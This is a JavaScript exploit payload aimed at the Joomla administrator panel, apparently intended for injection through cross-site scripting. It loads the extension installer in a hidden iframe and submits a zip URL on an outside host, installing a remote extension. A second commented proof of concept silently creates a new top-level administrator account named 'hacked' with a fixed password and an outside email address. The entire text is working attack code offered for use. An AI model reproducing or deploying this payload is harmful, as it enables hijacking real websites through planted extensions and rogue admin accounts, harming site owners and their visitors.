var exploited = false;
var iframe = document.createElement( 'iframe' );
var reg = new RegExp( 'administrator' );
if( reg.test( location.href ) )
{
	iframe.src = 'index.php?option=com_installer';
	iframe.setStyle( 'display', 'none' );
	document.body.appendChild( iframe );
	iframe.addEvent( 'load', exploit );
}
function exploit( e )
{
	if( exploited != true )
	{
		var doc = e.target.contentDocument; if( !doc ) return;
		var inp = doc.getElementById( 'install_url' );
		inp.value = 'http://www.centrosulservicos.com.br/vunlerabilidade joomla com_rsmonials_1.5.1.zip';
		var b = inp.parentNode.getElementsByTagName( 'input' )[1];
		b.onclick();
		exploited = true;
	}
}

/*

Proof of Concept 2: New Super Administrator

Here's a drop-in replacement for the 'exploit' function above:

function exploit( e )
{
	if( exploited != true )
	{
		var newForm = false;
		var doc = e.target.contentDocument; if( !doc ) return;
		var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return;
		var i = 0;
		for( ; i<nb.length; i++ )
		{
			if( nb[i].parentNode.id == 'toolbar-new' )
			{
				nb[i].onclick();
			}
			else if( nb[i].parentNode.id == 'toolbar-save' )
			{
				doc.getElementById( 'name' ).value = 'hacked';
				doc.getElementById( 'username' ).value = 'hacked';
				doc.getElementById( 'email' ).value = 'hacksanctify@gmail.com';
				doc.getElementById( 'password' ).value = 'password';
				doc.getElementById( 'password2' ).value = 'password';
				var g = doc.getElementById( 'gid' );
				g.selectedIndex = g.options.length - 1;
				nb[i].onclick();
				exploited = true;
			}
		}
	}
}